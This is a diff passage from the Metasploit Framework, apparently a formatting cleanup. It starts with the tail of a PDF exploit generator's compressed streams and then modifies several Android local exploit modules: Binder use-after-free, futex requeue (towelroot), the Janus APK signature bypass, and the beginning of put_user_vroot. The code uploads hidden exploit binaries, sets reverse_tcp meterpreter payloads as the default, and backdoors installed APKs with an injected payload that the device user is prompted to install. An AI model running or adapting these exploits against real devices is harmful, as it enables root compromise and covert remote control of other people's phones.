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')
+    add_compressed(38, 'eJxNjbEOgjAYhJ+Ad/hHWPgplIoJaVIwaGIwRGsciAtYCFGLQx18e1vi4HDDXe6+8/IcBdAEIjiiaKw7QEqc4xw3wsedKmYgMcjBhmOAFVCsJBZGYzUAS9OEYb23u2LbkjCCn65YCr98TP0dnipA2QCxwAZitjwdVW/ayFajkBGasQwYIWGSUVitY7c+vTvzeSm8TLdRGZR+Z/SCqx3t/I92NaH1bDj3vvt1NZc=')
+    add_compressed(43, 'eJzjtbHR9wpWMDFTMFAI0g/W90osSwxOLsosKLGz4wUAaC0Hzw==')
+    add_compressed(51, 'eJxNjtEKgkAQRb9g/mG/wHHRTEF8kPCpyDIoEB/UJivQrXUF+/t2Y4seLnPhzj1ciGNMUzGXruMyo4Bzxwt9tozMXVSYCdkfXg9iHNc0dOrKAh83tZK3ueS2ZPTnK9zTKCbZ0qjxuRRtQarEfJVVSYLF1CjN+4DRkPG0be7UqiQZlaS6B8460CC7xQu/YziTBBd46gfOAjeyYRj9wiMMsAMazpb0BnLmPE4=')
 
     js = Zlib::Deflate.deflate(js)
     add_object(46, "\x0d<</Filter[/FlateDecode]/Length #{js.length}>>stream\x0d#{js}\x0dendstream\x0d")
 
-    add_compressed(8, "eJzjtbHRd84vzStRMNR3yywqLlGwVDBQCNL3SYQzAxKLUoHy5mBOSGZJTqqGT35yYo6CS2ZxtqadHS8AmCkTkg==")
-    add_compressed(9, "eJzjtbHRd0ktLok2MlMwUAjSj4iMAtLmlkYKeaU5ObH6AYlFqXklChZgyWBXBUNTMCsksyQnVePff4YshmIGPYYShgqGEk07O14AWScVgw==")
-    add_compressed(17, "eJzjtbHR90vMTS2ONjZVMFAIUjAyAFGxdna8AF4CBlg=")
-    add_compressed(18, "eJzjtbHR90vMTS2ONrRUMFAIUjAyAFGxdna8AF4gBlo=")
-    add_compressed(19, "eJzj1UjLzEm10tfXd67RL0nNLdDPKtYrqSjR5AUAaRoIEQ==")
-    add_compressed(20, "eJzjtbHRdw7RKEmtKNEvyEnMzNPU93RRMDZVMFAI0vePNjIDMWL1g/WDA4DYU8HIECwTovHvP0MWQzGDHkMJQwVDiaZ+SLCGi5WRgaGJgbGxoaGhsampUZSmnR0vAOIUGEU=")
-    add_compressed(21, "eJzjtbHRdwxVMLRUMFAI0g8J1nCxMjIwNDEwNjY0NDQ2NTWK0rSz4wUAmbEH3g==")
-    add_compressed(39, "eJzjtbHRd0osTnXLzyvR90jNKUstyUxO1HXKz0nRd81Lzk/JzEtXMDFVMFAI0vdLzE0FqnHK1w8uTSqpLEjVDwEShmBSH2SAnR0vACeXGlQ=")
-    add_compressed(47, "eJzjtbHRd0osTnXLzyvR90jNKUstyUxO1HfNS85PycxLVzAxVTBQCNL3S8xNBUvrB5cmlVQWpOqHAAlDMKkP0mtnxwsAqd8Y1w==")
-    add_compressed(48, "eJzjtbHRd0osTnXLzyvRj0osSHPJzEtPSiwp1vdLzE0Firgk6QeXJpVUFqTqhwAJQzCpD1JuZ8cLAJhsFTA=")
-    add_compressed(45, "eJxNk81u2zAMx5+g75AnGJe0yFKgKGB0PgQYlsOaQzfswEi0LUSWUn1ky55+tJiovkQm+f+RFMXcPT3BV9N1FMgpir9WD3AIdCZQGLwDZYLKY2fpL2ifUClyCYbsegx5tJgT+N47OkIwrodkrKbF/SO8Z58ossvS4nENfcAzLZarDRyytZRAY99TuB76YIGsNadoItCoMQ5Arhyd9ZwYuoAqGW6nz8aWtJa69GEF0w8JRuNyhBOFNPgc0Wlpg9MfMFI1CnozhCzWh3/mLOkLngJqGjEcoTPcF3yLdupw18IPGdWbNjzE6Q4/xcEDsxSjAStSTxAl8q8ci+X6M7Q5eP54AJXD9AQXNtb8BP5I7oCBrQ3UxMqfLtKcD7ojvrBxPNcvK7C+Nwqt8wk+8Y+mDgL1JvJlSMOIqjREfSCCk81RZpX++Jh5YMYHSAPHqoUqJ4IxL5abeyg+PT19yaZIG2sR+N2rnvsZMapsS0ObzRR8zxiYmD4HtJ1UuDrjYvm4gqYsBjRSrZktW1NWCZp69aYsWNPCy618K3ArcDuD20ptRbMVzXam2VZNmwb4LuV2It+JfDeT766CSo3ZJnOyF9jJ4+4F3Qu6n6H7yrxJ8HXwgVeZwsg7erARUFiUMM5YlLJYU2AZA/Lf8zYGEpgEphlMlTKiMaIxM42pGuIxOCnnRe5F7mdyfxVUSpuzmRwyhCxgFjDPwFyJiwRTGcLl5v4Nr5cTv6JTnNv1z893/wElCbzZ")
-    add_compressed(23, "eJxNzLEKgzAQgOEn8B2ymVCqd4npUEQQXQsdCp0Tc4Ol9Ep6Qh+/gg7d/+8v2rYeMgWZ+TUGIT2eLWADziE65z0ewJYApdkqzrpPHEn1U+YYRCFWYOoLp3/sV2yxsacj+A1fM6dlolXv7k5RDeEtS6b9cZvlSfrxqeQrpuuKH+VYK70=")
+    add_compressed(8, 'eJzjtbHRd84vzStRMNR3yywqLlGwVDBQCNL3SYQzAxKLUoHy5mBOSGZJTqqGT35yYo6CS2ZxtqadHS8AmCkTkg==')
+    add_compressed(9, 'eJzjtbHRd0ktLok2MlMwUAjSj4iMAtLmlkYKeaU5ObH6AYlFqXklChZgyWBXBUNTMCsksyQnVePff4YshmIGPYYShgqGEk07O14AWScVgw==')
+    add_compressed(17, 'eJzjtbHR90vMTS2ONjZVMFAIUjAyAFGxdna8AF4CBlg=')
+    add_compressed(18, 'eJzjtbHR90vMTS2ONrRUMFAIUjAyAFGxdna8AF4gBlo=')
+    add_compressed(19, 'eJzj1UjLzEm10tfXd67RL0nNLdDPKtYrqSjR5AUAaRoIEQ==')
+    add_compressed(20, 'eJzjtbHRdw7RKEmtKNEvyEnMzNPU93RRMDZVMFAI0vePNjIDMWL1g/WDA4DYU8HIECwTovHvP0MWQzGDHkMJQwVDiaZ+SLCGi5WRgaGJgbGxoaGhsampUZSmnR0vAOIUGEU=')
+    add_compressed(21, 'eJzjtbHRdwxVMLRUMFAI0g8J1nCxMjIwNDEwNjY0NDQ2NTWK0rSz4wUAmbEH3g==')
+    add_compressed(39, 'eJzjtbHRd0osTnXLzyvR90jNKUstyUxO1HXKz0nRd81Lzk/JzEtXMDFVMFAI0vdLzE0FqnHK1w8uTSqpLEjVDwEShmBSH2SAnR0vACeXGlQ=')
+    add_compressed(47, 'eJzjtbHRd0osTnXLzyvR90jNKUstyUxO1HfNS85PycxLVzAxVTBQCNL3S8xNBUvrB5cmlVQWpOqHAAlDMKkP0mtnxwsAqd8Y1w==')
+    add_compressed(48, 'eJzjtbHRd0osTnXLzyvRj0osSHPJzEtPSiwp1vdLzE0Firgk6QeXJpVUFqTqhwAJQzCpD1JuZ8cLAJhsFTA=')
+    add_compressed(45, 'eJxNk81u2zAMx5+g75AnGJe0yFKgKGB0PgQYlsOaQzfswEi0LUSWUn1ky55+tJiovkQm+f+RFMXcPT3BV9N1FMgpir9WD3AIdCZQGLwDZYLKY2fpL2ifUClyCYbsegx5tJgT+N47OkIwrodkrKbF/SO8Z58ossvS4nENfcAzLZarDRyytZRAY99TuB76YIGsNadoItCoMQ5Arhyd9ZwYuoAqGW6nz8aWtJa69GEF0w8JRuNyhBOFNPgc0Wlpg9MfMFI1CnozhCzWh3/mLOkLngJqGjEcoTPcF3yLdupw18IPGdWbNjzE6Q4/xcEDsxSjAStSTxAl8q8ci+X6M7Q5eP54AJXD9AQXNtb8BP5I7oCBrQ3UxMqfLtKcD7ojvrBxPNcvK7C+Nwqt8wk+8Y+mDgL1JvJlSMOIqjREfSCCk81RZpX++Jh5YMYHSAPHqoUqJ4IxL5abeyg+PT19yaZIG2sR+N2rnvsZMapsS0ObzRR8zxiYmD4HtJ1UuDrjYvm4gqYsBjRSrZktW1NWCZp69aYsWNPCy618K3ArcDuD20ptRbMVzXam2VZNmwb4LuV2It+JfDeT766CSo3ZJnOyF9jJ4+4F3Qu6n6H7yrxJ8HXwgVeZwsg7erARUFiUMM5YlLJYU2AZA/Lf8zYGEpgEphlMlTKiMaIxM42pGuIxOCnnRe5F7mdyfxVUSpuzmRwyhCxgFjDPwFyJiwRTGcLl5v4Nr5cTv6JTnNv1z893/wElCbzZ')
+    add_compressed(23, 'eJxNzLEKgzAQgOEn8B2ymVCqd4npUEQQXQsdCp0Tc4Ol9Ep6Qh+/gg7d/+8v2rYeMgWZ+TUGIT2eLWADziE65z0ewJYApdkqzrpPHEn1U+YYRCFWYOoLp3/sV2yxsacj+A1fM6dlolXv7k5RDeEtS6b9cZvlSfrxqeQrpuuKH+VYK70=')
 
     @xref_offset = @pdf.length
     @pdf << xref_table << trailer(25) << startxref

--- a/modules/exploits/android/local/binder_uaf.rb
+++ b/modules/exploits/android/local/binder_uaf.rb
@@ -15,70 +15,73 @@ class MetasploitModule < Msf::Exploit::Local
     super(
       update_info(
         info,
-        {
-          'Name' => "Android Binder Use-After-Free Exploit",
-          'Description' => %q{
-            This module exploits CVE-2019-2215, which is a use-after-free in Binder in the
-            Android kernel. The bug is a local privilege escalation vulnerability that
-            allows for a full compromise of a vulnerable device. If chained with a browser
-            renderer exploit, this bug could fully compromise a device through a malicious
-            website.
-            The freed memory is replaced with an iovec structure in order to leak a pointer
-            to the task_struct. Finally the bug is triggered again in order to overwrite
-            the addr_limit, making all memory (including kernel memory) accessible as part
-            of the user-space memory range in our process and allowing arbitrary reading
-            and writing of kernel memory.
-          },
-          'License' => MSF_LICENSE,
-          'Author' => [
-            'Jann Horn', # discovery and exploit
-            'Maddie Stone', # discovery and exploit
-            'grant-h',      # Qu1ckR00t
-            'timwr',        # metasploit module
-          ],
-          'References' => [
-            [ 'CVE', '2019-2215' ],
-            [ 'URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1942' ],
-            [ 'URL', 'https://googleprojectzero.blogspot.com/2019/11/bad-binder-android-in-wild-exploit.html' ],
-            [ 'URL', 'https://hernan.de/blog/2019/10/15/tailoring-cve-2019-2215-to-achieve-root/' ],
-            [ 'URL', 'https://github.com/grant-h/qu1ckr00t/blob/master/native/poc.c' ],
-          ],
-          'DisclosureDate' => '2019-09-26',
-          'SessionTypes' => [ 'meterpreter' ],
-          'Platform' => [ "android", "linux" ],
-          'Arch' => [ ARCH_AARCH64 ],
-          'Targets' => [[ 'Auto', {} ]],
-          'DefaultOptions' => {
-            'PAYLOAD' => 'linux/aarch64/meterpreter/reverse_tcp',
-            'WfsDelay' => 5,
-          },
-          'DefaultTarget' => 0,
-          'Compat' => {
-            'Meterpreter' => {
-              'Commands' => %w[
-                stdapi_fs_getwd
-              ]
-            }
-          },
+        'Name' => 'Android Binder Use-After-Free Exploit',
+        'Description' => %q{
+          This module exploits CVE-2019-2215, which is a use-after-free in Binder in the
+          Android kernel. The bug is a local privilege escalation vulnerability that
+          allows for a full compromise of a vulnerable device. If chained with a browser
+          renderer exploit, this bug could fully compromise a device through a malicious
+          website.
+          The freed memory is replaced with an iovec structure in order to leak a pointer
+          to the task_struct. Finally the bug is triggered again in order to overwrite
+          the addr_limit, making all memory (including kernel memory) accessible as part
+          of the user-space memory range in our process and allowing arbitrary reading
+          and writing of kernel memory.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Jann Horn',    # discovery and exploit
+          'Maddie Stone', # discovery and exploit
+          'grant-h',      # Qu1ckR00t
+          'timwr',        # metasploit module
+        ],
+        'References' => [
+          [ 'CVE', '2019-2215' ],
+          [ 'URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1942' ],
+          [ 'URL', 'https://googleprojectzero.blogspot.com/2019/11/bad-binder-android-in-wild-exploit.html' ],
+          [ 'URL', 'https://hernan.de/blog/2019/10/15/tailoring-cve-2019-2215-to-achieve-root/' ],
+          [ 'URL', 'https://github.com/grant-h/qu1ckr00t/blob/master/native/poc.c' ],
+        ],
+        'DisclosureDate' => '2019-09-26',
+        'SessionTypes' => [ 'meterpreter' ],
+        'Platform' => [ 'android', 'linux' ],
+        'Arch' => [ ARCH_AARCH64 ],
+        'Targets' => [[ 'Auto', {} ]],
+        'DefaultOptions' => {
+          'PAYLOAD' => 'linux/aarch64/meterpreter/reverse_tcp',
+          'WfsDelay' => 5
+        },
+        'DefaultTarget' => 0,
+        'Compat' => {
+          'Meterpreter' => {
+            'Commands' => %w[
+              stdapi_fs_getwd
+            ]
+          }
+        },
+        'Notes' => {
+          'SideEffects' => [ ARTIFACTS_ON_DISK ],
+          'Reliability' => [ UNRELIABLE_SESSION ],
+          'Stability' => [ CRASH_SAFE ]
         }
       )
     )
   end
 
   def upload_and_chmodx(path, data)
-    write_file path, data
+    write_file(path, data)
     chmod(path)
     register_file_for_cleanup(path)
   end
 
   def exploit
-    local_file = File.join(Msf::Config.data_directory, "exploits", "CVE-2019-2215", "exploit")
+    local_file = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2019-2215', 'exploit')
     exploit_data = File.read(local_file, mode: 'rb')
 
     workingdir = session.fs.dir.getwd
-    exploit_file = "#{workingdir}/.#{Rex::Text::rand_text_alpha_lower(5)}"
+    exploit_file = "#{workingdir}/.#{Rex::Text.rand_text_alpha_lower(5)}"
     upload_and_chmodx(exploit_file, exploit_data)
-    payload_file = "#{workingdir}/.#{Rex::Text::rand_text_alpha_lower(5)}"
+    payload_file = "#{workingdir}/.#{Rex::Text.rand_text_alpha_lower(5)}"
     upload_and_chmodx(payload_file, generate_payload_exe)
 
     print_status("Executing exploit '#{exploit_file}'")

--- a/modules/exploits/android/local/futex_requeue.rb
+++ b/modules/exploits/android/local/futex_requeue.rb
@@ -34,17 +34,18 @@ class MetasploitModule < Msf::Exploit::Local
           ],
           'DisclosureDate' => '2014-05-03',
           'SessionTypes' => [ 'meterpreter' ],
-          'Platform' => [ "android", "linux" ],
-          'Payload' => { 'Space' => 2048, },
+          'Platform' => [ 'android', 'linux' ],
+          'Payload' => { 'Space' => 2048 },
           'DefaultOptions' => {
             'WfsDelay' => 300,
-            'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp',
+            'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp'
           },
           'Notes' => {
             'Stability' => [CRASH_SAFE],
             'SideEffects' => [],
             'Reliability' => [],
-            'AKA' => ['towelroot'] },
+            'AKA' => ['towelroot']
+          },
           'DefaultTarget' => 0,
           'Targets' => [
             # Automatic targetting via getprop ro.build.model
@@ -57,7 +58,7 @@ class MetasploitModule < Msf::Exploit::Local
                 'new_samsung' => false,
                 'iovstack' => 2,
                 'offset' => 0,
-                'force_remove' => false,
+                'force_remove' => false
               }
             ],
 
@@ -68,7 +69,7 @@ class MetasploitModule < Msf::Exploit::Local
                 'new_samsung' => true,
                 'iovstack' => 2,
                 'offset' => 7380,
-                'force_remove' => true,
+                'force_remove' => true
               }
             ],
 
@@ -79,7 +80,7 @@ class MetasploitModule < Msf::Exploit::Local
                 'new_samsung' => false,
                 'iovstack' => 1,
                 'offset' => 0,
-                'force_remove' => true,
+                'force_remove' => true
               }
             ],
 
@@ -90,7 +91,7 @@ class MetasploitModule < Msf::Exploit::Local
                 'new_samsung' => false,
                 'iovstack' => 5,
                 'offset' => 0,
-                'force_remove' => true,
+                'force_remove' => true
               }
             ],
           ],
@@ -102,14 +103,14 @@ class MetasploitModule < Msf::Exploit::Local
                 stdapi_fs_getwd
               ]
             }
-          },
+          }
         }
       )
     )
   end
 
   def check
-    os = cmd_exec("getprop ro.build.version.release")
+    os = cmd_exec('getprop ro.build.version.release')
     unless Rex::Version.new(os) < Rex::Version.new('4.5.0')
       vprint_error "Android version #{os} does not appear to be vulnerable"
       return CheckCode::Safe
@@ -121,38 +122,38 @@ class MetasploitModule < Msf::Exploit::Local
 
   def exploit
     if target['auto']
-      product = cmd_exec("getprop ro.build.product")
-      fingerprint = cmd_exec("getprop ro.build.fingerprint")
+      product = cmd_exec('getprop ro.build.product')
+      fingerprint = cmd_exec('getprop ro.build.fingerprint')
       print_status("Found device: #{product}")
       print_status("Fingerprint: #{fingerprint}")
 
       if [
-        "mako",
-        "m7",
-        "hammerhead",
-        "grouper",
-        "Y530-U00",
-        "G6-U10",
-        "g2",
-        "w7n",
-        "D2303",
-        "cancro",
+        'mako',
+        'm7',
+        'hammerhead',
+        'grouper',
+        'Y530-U00',
+        'G6-U10',
+        'g2',
+        'w7n',
+        'D2303',
+        'cancro',
       ].include? product
         my_target = targets[1] # Default
       elsif [
-        "klte", # Samsung Galaxy S5
-        "jflte", # Samsung Galaxy S4
-        "d2vzw" # Samsung Galaxy S3 Verizon (SCH-I535 w/ android 4.4.2, kernel 3.4.0)
+        'klte', # Samsung Galaxy S5
+        'jflte', # Samsung Galaxy S4
+        'd2vzw' # Samsung Galaxy S3 Verizon (SCH-I535 w/ android 4.4.2, kernel 3.4.0)
       ].include? product
         my_target = targets[2] # New Samsung
       elsif [
-        "t03g",
-        "m0",
+        't03g',
+        'm0',
       ].include? product
         my_target = targets[3] # Old Samsung
       elsif [
-        "baffinlite",
-        "Vodafone_785",
+        'baffinlite',
+        'Vodafone_785',
       ].include? product
         my_target = targets[4] # Samsung Grand
       else
@@ -165,7 +166,7 @@ class MetasploitModule < Msf::Exploit::Local
 
     print_status("Using target: #{my_target.name}")
 
-    local_file = File.join(Msf::Config.data_directory, "exploits", "CVE-2014-3153.so")
+    local_file = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-3153.so')
     exploit_data = File.read(local_file, mode: 'rb')
 
     # Substitute the exploit shellcode with our own
@@ -181,10 +182,10 @@ class MetasploitModule < Msf::Exploit::Local
       offsets['offset'].to_i,
       offsets['force_remove'] ? -1 : 0,
     ].pack('I4')
-    exploit_data.gsub!("c0nfig" + "\x00" * 10, config_buf)
+    exploit_data.gsub!('c0nfig' + "\x00" * 10, config_buf)
 
     workingdir = session.fs.dir.getwd
-    remote_file = "#{workingdir}/#{Rex::Text::rand_text_alpha_lower(5)}"
+    remote_file = "#{workingdir}/#{Rex::Text.rand_text_alpha_lower(5)}"
     write_file(remote_file, exploit_data)
 
     print_status("Loading exploit library #{remote_file}")

--- a/modules/exploits/android/local/janus.rb
+++ b/modules/exploits/android/local/janus.rb
@@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Local
       update_info(
         info,
         {
-          'Name' => "Android Janus APK Signature bypass",
+          'Name' => 'Android Janus APK Signature bypass',
           'Description' => %q{
             This module exploits CVE-2017-13156 in Android to install a payload into another
             application. The payload APK will have the same signature and can be installed
@@ -34,9 +34,9 @@ class MetasploitModule < Msf::Exploit::Local
             'h00die',      # metasploit module
           ],
           'References' => [
-            [ 'CVE', '2017-13156' ],
-            [ 'URL', 'https://www.guardsquare.com/en/blog/new-android-vulnerability-allows-attackers-modify-apps-without-affecting-their-signatures' ],
-            [ 'URL', 'https://github.com/V-E-O/PoC/tree/master/CVE-2017-13156' ],
+            ['CVE', '2017-13156'],
+            ['URL', 'https://www.guardsquare.com/en/blog/new-android-vulnerability-allows-attackers-modify-apps-without-affecting-their-signatures'],
+            ['URL', 'https://github.com/V-E-O/PoC/tree/master/CVE-2017-13156'],
           ],
           'DisclosureDate' => '2017-07-31',
           'SessionTypes' => [ 'meterpreter' ],
@@ -46,13 +46,13 @@ class MetasploitModule < Msf::Exploit::Local
           'DefaultOptions' => {
             'PAYLOAD' => 'android/meterpreter/reverse_tcp',
             'AndroidWakelock' => false, # the target may not have the WAKE_LOCK permission
-            'DisablePayloadHandler' => true,
+            'DisablePayloadHandler' => true
           },
           'DefaultTarget' => 0,
           'Notes' => {
             'SideEffects' => [ARTIFACTS_ON_DISK, SCREEN_EFFECTS],
             'Reliability' => [],
-            'Stability' => [SERVICE_RESOURCE_LOSS], # ZTE youtube app won't start anymore
+            'Stability' => [SERVICE_RESOURCE_LOSS] # ZTE youtube app won't start anymore
           },
           'Compat' => {
             'Meterpreter' => {
@@ -70,96 +70,98 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def check
-    os = cmd_exec("getprop ro.build.version.release")
+    os = cmd_exec('getprop ro.build.version.release')
+
     unless Rex::Version.new(os).between?(Rex::Version.new('5.1.1'), Rex::Version.new('8.0.0'))
-      vprint_error "Android version #{os} is not vulnerable."
-      return CheckCode::Safe
+      return CheckCode::Safe("Android version #{os} is not vulnerable.")
     end
-    vprint_good "Android version #{os} appears to be vulnerable."
+
+    vprint_good("Android version #{os} appears to be vulnerable.")
 
     patch = cmd_exec('getprop ro.build.version.security_patch')
+
     if patch.empty?
-      print_status 'Unable to determine patch level.  Pre-5.0 this is unaccessible.'
-    elsif patch > '2017-12-05'
-      vprint_error "Android security patch level #{patch} is patched."
-      return CheckCode::Safe
-    else
-      vprint_good "Android security patch level #{patch} is vulnerable"
+      return CheckCode::Appears('Unable to determine patch level. Pre-5.0 this is unaccessible.')
     end
 
-    CheckCode::Appears
+    if patch > '2017-12-05'
+      return CheckCode::Safe("Android security patch level #{patch} is patched.")
+    end
+
+    CheckCode::Appears("Android security patch level #{patch} is vulnerable.")
+  end
+
+  def infect(apkfile)
+    unless apkfile.start_with?('package:')
+      fail_with(Failure::BadConfig, 'Unable to locate app apk')
+    end
+
+    apkfile = apkfile[8..]
+    print_status("Downloading APK: #{apkfile}")
+    apk_data = read_file(apkfile)
+
+    # Create an apk with the payload injected
+    apk_backdoor = ::Msf::Payload::Apk.new
+    apk_zip = apk_backdoor.backdoor_apk(nil, payload.encoded, false, false, apk_data, false)
+
+    # Extract the classes.dex
+    dex_data = ''
+    Zip::File.open_buffer(apk_zip) do |zipfile|
+      dex_data = zipfile.read('classes.dex')
+    end
+    dex_size = dex_data.length
+
+    # Fix the original APKs zip file code directory
+    cd_end_addr = apk_data.rindex("\x50\x4b\x05\x06")
+    cd_start_addr = apk_data[cd_end_addr + 16, cd_end_addr + 20].unpack('V')[0]
+    apk_data[cd_end_addr + 16...cd_end_addr + 20] = [ cd_start_addr + dex_size ].pack('V')
+    pos = cd_start_addr
+    while pos && pos < cd_end_addr
+      offset = apk_data[pos + 42, pos + 46].unpack('V')[0]
+      apk_data[pos + 42...pos + 46] = [ offset + dex_size ].pack('V')
+      pos = apk_data.index("\x50\x4b\x01\x02", pos + 46)
+    end
+
+    # Prepend the new classes.dex to the apk
+    out_data = dex_data + apk_data
+    out_data[32...36] = [ out_data.length ].pack('V')
+    out_data = fix_dex_header(out_data)
+
+    out_apk = "/sdcard/#{Rex::Text.rand_text_alphanumeric(6)}.apk"
+    print_status("Uploading APK: #{out_apk}")
+    write_file(out_apk, out_data)
+    register_file_for_cleanup(out_apk)
+    print_status('APK uploaded')
+
+    # Prompt the user to update the APK
+    session.appapi.app_install(out_apk)
+    print_status('User should now have a prompt to install an updated version of the app')
+    true
+  rescue StandardError => e
+    print_error e.to_s
+    false
   end
 
   def exploit
-    def infect(apkfile)
-      unless apkfile.start_with?("package:")
-        fail_with Failure::BadConfig, 'Unable to locate app apk'
-      end
-      apkfile = apkfile[8..-1]
-      print_status "Downloading APK: #{apkfile}"
-      apk_data = read_file(apkfile)
-
-      begin
-        # Create an apk with the payload injected
-        apk_backdoor = ::Msf::Payload::Apk.new
-        apk_zip = apk_backdoor.backdoor_apk(nil, payload.encoded, false, false, apk_data, false)
-
-        # Extract the classes.dex
-        dex_data = ''
-        Zip::File.open_buffer(apk_zip) do |zipfile|
-          dex_data = zipfile.read("classes.dex")
-        end
-        dex_size = dex_data.length
-
-        # Fix the original APKs zip file code directory
-        cd_end_addr = apk_data.rindex("\x50\x4b\x05\x06")
-        cd_start_addr = apk_data[cd_end_addr + 16, cd_end_addr + 20].unpack("V")[0]
-        apk_data[cd_end_addr + 16...cd_end_addr + 20] = [ cd_start_addr + dex_size ].pack("V")
-        pos = cd_start_addr
-        while pos && pos < cd_end_addr
-          offset = apk_data[pos + 42, pos + 46].unpack("V")[0]
-          apk_data[pos + 42...pos + 46] = [ offset + dex_size ].pack("V")
-          pos = apk_data.index("\x50\x4b\x01\x02", pos + 46)
-        end
-
-        # Prepend the new classes.dex to the apk
-        out_data = dex_data + apk_data
-        out_data[32...36] = [ out_data.length ].pack("V")
-        out_data = fix_dex_header(out_data)
-
-        out_apk = "/sdcard/#{Rex::Text.rand_text_alphanumeric 6}.apk"
-        print_status "Uploading APK: #{out_apk}"
-        write_file(out_apk, out_data)
-        register_file_for_cleanup(out_apk)
-        print_status "APK uploaded"
-
-        # Prompt the user to update the APK
-        session.appapi.app_install(out_apk)
-        print_status "User should now have a prompt to install an updated version of the app"
-        true
-      rescue => e
-        print_error e.to_s
-        false
-      end
-    end
-
-    if datastore["PACKAGE"] == 'ALL'
+    if datastore['PACKAGE'] == 'ALL'
       vprint_status('Finding installed packages (this can take a few minutes depending on list of installed packages)')
-      apkfiles = []
-      all = cmd_exec("pm list packages").split("\n")
+      all = cmd_exec('pm list packages').split("\n")
       c = 1
+
+      ignore = [
+        'com.metasploit.stage', # avoid injecting into ourself
+      ]
+
       all.each do |package|
         package = package.split(':')[1]
         vprint_status("Attempting exploit of apk #{c}/#{all.length} for #{package}")
         c += 1
-        next if ['com.metasploit.stage', # avoid injecting into ourself
-                ].include? package # This was left on purpose to be expanded as need be for testing
+        next if ignore.include?(package)
 
-        result = infect(cmd_exec("pm path #{package}"))
-        break if result
+        break if infect(cmd_exec("pm path #{package}"))
       end
     else
-      infect(cmd_exec("pm path #{datastore["PACKAGE"]}"))
+      infect(cmd_exec("pm path #{datastore['PACKAGE']}"))
     end
   end
 end

--- a/modules/exploits/android/local/put_user_vroot.rb
+++ b/modules/exploits/android/local/put_user_vroot.rb
@@ -13,54 +13,57 @@ class MetasploitModule < Msf::Exploit::Local
     super(
       update_info(
         info,
-        {
-          'Name' => "Android get_user/put_user Exploit",
-          'Description' => %q{
-            This module exploits a missing check in the get_user and put_user API functions
-            in the linux kernel before 3.5.5. The missing checks on these functions
